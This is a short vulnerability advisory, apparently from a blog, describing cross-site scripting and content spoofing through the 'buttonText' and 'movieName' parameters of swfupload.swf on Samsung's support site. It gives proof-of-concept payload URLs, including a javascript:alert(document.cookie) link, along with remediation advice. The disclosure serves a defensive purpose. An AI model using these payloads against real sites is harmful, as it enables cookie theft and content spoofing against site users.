Cross Site Scripting in Samsung Official Support Website

#Title: Cross Site Scripting in Samsung Official Support Website

Vector of operation: Remote
Impact: Cross Site Scripting & Content Spoofing


The vulnerability is caused due to insufficient input validation in the parameter
“movieName” and "buttonText" in the script to swfupload.swf “ ()”. This can be
exploited to execute arbitrary HTML and script code in a user’s browser session in
context of an affected site.

There are two vulnerabilities in Samsung Official Support Website.

*Content Spoofing

http://[victim]/include/SWF/swfupload.swf?buttonText=test<img src=''>

It's possible to inject text, images and html (e.g. for link injection).

*Cross-Site Scripting

http://[victim]/include/SWF/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click Me</a>

Code will execute after click. It's strictly social XSS.

*Proof of Concept Code

http://[victim]/include/SWF/swfupload.swf?buttonText=test<img src=''>

*Live Preview"]);}catch(e){}if(!self.a)self.a=!alert("xss");//<a href='javascript:alert(document.cookie)'>Click me</a>

On the server side, you can upgrade to a non-vulnerable version. Onthe client
you can use a browser that obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera.
Internet Explorer 8 with the XSS Filter won't execute the malicious scripts.

Postingan terkait:

Belum ada tanggapan untuk "Cross Site Scripting in Samsung Official Support Website"

Post a Comment